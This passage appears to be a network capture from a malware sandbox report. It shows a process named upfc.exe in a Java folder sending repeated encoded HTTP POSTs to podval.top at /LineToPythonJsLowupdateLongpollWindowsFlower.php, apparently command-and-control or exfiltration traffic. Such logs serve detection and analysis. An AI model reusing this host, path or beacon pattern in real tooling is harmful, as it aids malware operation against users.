                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    70 | 192.168.2.10 | 49788 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:03.923052073 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:04.276200056 CEST | 1056 | OUT
                                                    Jul 3, 2024 16:43:04.375960112 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:04.582230091 CEST | 586 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAK2qXeutTz2BwNX92io7XHxCFxMplWQU5sZ%2BFJuUk1XS%2Fm32tDTV4x6bK9ip%2F9QiMSpNDlOEtEosLEzkz%2BjqldRsUSW%2Fo9AKowPI5F9xgncxFUwEzFz%2BG0Fd57E"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5501ef67283-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    71 | 192.168.2.10 | 49789 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:04.722534895 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    72 | 192.168.2.10 | 49790 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:04.814162970 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:05.166531086 CEST | 1748 | OUT
                                                    Jul 3, 2024 16:43:05.272058964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.619252920 CEST | 735 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y9W%2FVHAFAtePRpwanFi5fV8w%2FUvr1rg0ysVvXwzBIPobt2Ul3YiUXqjDVwdgshHaTjI%2FagS3WvEMP9xYKdfgOIMdNpVw%2BhJMz%2B03EX0RLUrqKCeLKGR9Z7Mnnh%2FJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a555abb21962-EWR
                                                    alt-svc: h2=":443"; ma=60


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    73 | 192.168.2.10 | 49791 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:04.939601898 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:05.291486025 CEST | 1060 | OUT
                                                    Jul 3, 2024 16:43:05.409528971 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:05.766952991 CEST | 590 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNxQ3KTsM%2F8qJG%2B1BQACGPl7jL5%2Fe%2BTqvFQRVT04bveVOGPwPGt7CkAb%2FA2ZWgoOJmYhzJJ1Jbi7We82ypcuE%2BjMmshTOAuc%2FRGOoVxfnlRxEpV3aR1gd%2FahaSLa"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5568d310f93-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    74 | 192.168.2.10 | 49792 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:05.967770100 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:06.322781086 CEST | 1060 | OUT
                                                    Jul 3, 2024 16:43:06.421659946 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:06.774306059 CEST | 588 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H83%2BpY%2B2jWNy1n%2BsyQ2%2B%2Bn8zuJnkJYdvW7sbPekWoZ5o6q7jfZ7hMYk1m7KOwMKait7kUy%2FTl8swun3F1BcPbre%2FOr0yiGv3eXIwgz7iDD7XWLb5pKZizyTZ9IWa"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a55cd84e1799-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    75 | 192.168.2.10 | 49793 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:06.908566952 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:07.260411978 CEST | 1060 | OUT | Data Raw: 5f 55 5f 5b 5b 5a 57 5d 58 56 55 51 50 5c 59 5b 55 58 5e 5e 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_[[ZW]XVUQP\Y[UX^^QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&:$B$:?_38)=57].-09[3;=7_#!4-,"['$Y 1
                                                    Jul 3, 2024 16:43:07.359199047 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:07.700212002 CEST | 584 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50Xu0EBOTbDRFKzBHi6w3e%2B1r5xBFHl8WCwGQfqz%2FYoWC0UZtPKQzSsJga8sgd2WKm1Ud0c7Rr5K%2BlmObE31Rgbx4GDBxQbn5Pi8vO%2FmGJ1JCrs1jup%2BOm6q3CO8"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a562bf394251-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    76 | 192.168.2.10 | 49794 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:07.832609892 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:08.184910059 CEST | 1056 | OUT | Data Raw: 5a 50 5a 5c 5b 59 57 50 58 56 55 51 50 59 59 5b 55 5f 5e 5c 51 5e 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZPZ\[YWPXVUQPYY[U_^\Q^SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:,C&)/$V'*-9 -)Z->0&*3U(;?7"^8<"['$Y
                                                    Jul 3, 2024 16:43:08.290664911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:08.500013113 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuBryzYoP0Qy5fz2appbir9oeIwKAIu5JltDLLTevNMtBExcNBVZhePjcV5rnFzEiS2vRB6s1tnL0VGAnD9SNImeQHnYBWgbZ%2BUtvKN4WpJoPQQNUB9Ap%2FIHil%2B5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a568894343bc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    77 | 192.168.2.10 | 49795 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:08.635104895 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:08.995044947 CEST | 1060 | OUT | Data Raw: 5f 52 5f 54 5b 5d 57 5c 58 56 55 51 50 5f 59 57 55 5d 5e 5d 51 5a 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _R_T[]W\XVUQP_YWU]^]QZS\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"\%/&)$'V+*24.:9>35=X'<;$#2;;<"['$Y =
                                                    Jul 3, 2024 16:43:09.100713015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:09.441617012 CEST | 578 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNakdvaGt9nJT%2F1QWzfSotoZB1EfEJwsYZjoG4b%2FZpAvx12uo4ODjU8FTwNITJ22Y8hdnQtMAq5uB22gVk3rcR0pJ5WMeP1L7QTJNPWi0d0M3o63HhGfXZ2MxS69"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a56d99c9176c-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    78 | 192.168.2.10 | 49796 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:09.592525005 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:09.947793007 CEST | 1060 | OUT | Data Raw: 5f 54 5f 5d 5b 56 57 51 58 56 55 51 50 5b 59 51 55 5f 5e 59 51 58 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_][VWQXVUQP[YQU_^YQXS[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%:03$ >=9 .&&=[$3T8=+Z 38"['$Y -
                                                    Jul 3, 2024 16:43:10.062401056 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:10.413378954 CEST | 571 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqOIZ0aRfhdQoHWP5JtilmlrY5w%2FpUCQZR7IbDWVbCIOQte3Z42GO5nbZDHo64H762m0KkfzA4rUAJgso4MMOMkVjCgLOwmghUcmGSL6Po49j1Jc36A9XfLKQ4AC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5739a794297-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:43:10.508276939 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    79 | 192.168.2.10 | 49797 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:10.767369032 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:11.119899988 CEST | 1060 | OUT | Data Raw: 5f 5a 5a 5c 5b 56 57 5b 58 56 55 51 50 5e 59 51 55 5c 5e 5a 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ\[VW[XVUQP^YQU\^ZQ^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%/$:+Y'0(.T!=%-X9\0>300,#_"! X;"['$Y
                                                    Jul 3, 2024 16:43:11.127254009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.554713964 CEST | 576 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZGyrXv3Zm7W5NauLpYmEkJbJTrsbPDfSVrYBRhlDOO%2FYKAbF1y4u58OQNR7ymqGlwFHwWUjgFncumstq6D6iXUWssT7mHxGQPnTq7rGrkFVbGXx0UatdUcLWTWFo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57a3db57c78-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    80 | 192.168.2.10 | 49798 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:10.767451048 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:11.119899035 CEST | 1748 | OUT | Data Raw: 5f 5a 5a 5c 5b 5c 57 5a 58 56 55 51 50 50 59 53 55 5b 5e 55 51 5f 53 5c 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZ\[\WZXVUQPPYSU[^UQ_S\SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%_#$:$30_=.T!=:]0%![3 /+40Z-,"['$Y
                                                    Jul 3, 2024 16:43:11.127140999 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:11.560034037 CEST | 737 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3ck7kWQ5sqAmiAOQhLCcsN%2F%2FmReF8mZMs6tUxkbpqLs8%2FR8j%2BkS4BLPYC%2BCshVZv1hWAZEBK1I0iardmcHRmeSMgBHNVW2eRXibCZsz%2BBDPoK4D5Tsjtd8D%2Fl56"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a57a3b0680d0-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 00 26 14 35 5a 31 31 20 0a 2d 3d 24 09 3c 03 28 5d 2c 17 22 06 3f 24 2d 5d 3a 10 0c 52 22 3a 2e 18 2a 2f 2c 16 25 0e 0a 54 21 1b 20 5b 04 1c 23 59 3f 2a 25 58 3f 06 0a 0b 31 2f 31 46 24 19 21 59 24 28 21 0b 30 3b 20 04 3c 06 3a 09 27 0c 24 00 29 01 2e 5b 2a 37 07 01 35 24 21 54 02 13 22 1f 25 3e 36 0e 20 20 27 1e 25 33 22 01 27 24 30 09 25 20 32 52 3d 33 39 0b 30 31 30 58 22 3f 05 55 30 01 2e 5f 30 5b 2d 5d 35 38 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&&5Z11 -=$<(],"?$-]:R":.*/,%T! [#Y?*%X?1/1F$!Y$(!0; <:'$).[*75$!T"%>6 '%3"'$0% 2R=39010X"?U0._0[-]58#_+)V3YT0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    81 | 192.168.2.10 | 49799 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:11.687819958 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:43:12.041554928 CEST | 1060 | OUT | Data Raw: 5a 50 5f 5f 5b 57 57 5a 58 56 55 51 50 5b 59 54 55 59 5e 58 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZP__[WWZXVUQP[YTUY^XQ^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y&_;0'0?*.&45,.Y$'#?/>[7(_/,"['$Y -
                                                    Jul 3, 2024 16:43:12.148017883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:12.559828043 CEST | 580 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:12 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1o4FVcmko5p3PLkRw1Y9Yy6FcwSSKTT078rOpDgNZkgCh9kYlf6l8o4poOuQJdEIytXfQxZkhIDhIgTMID0EkeDf0%2FSwP%2FvlCufWu%2FohWZHK9BqXXsnsdtU0kJ1"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a58098888cb4-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    82 | 192.168.2.10 | 49800 | 188.114.97.3 | 80 | 6960 | C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jul 3, 2024 16:43:12.696732044 CEST | 294 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
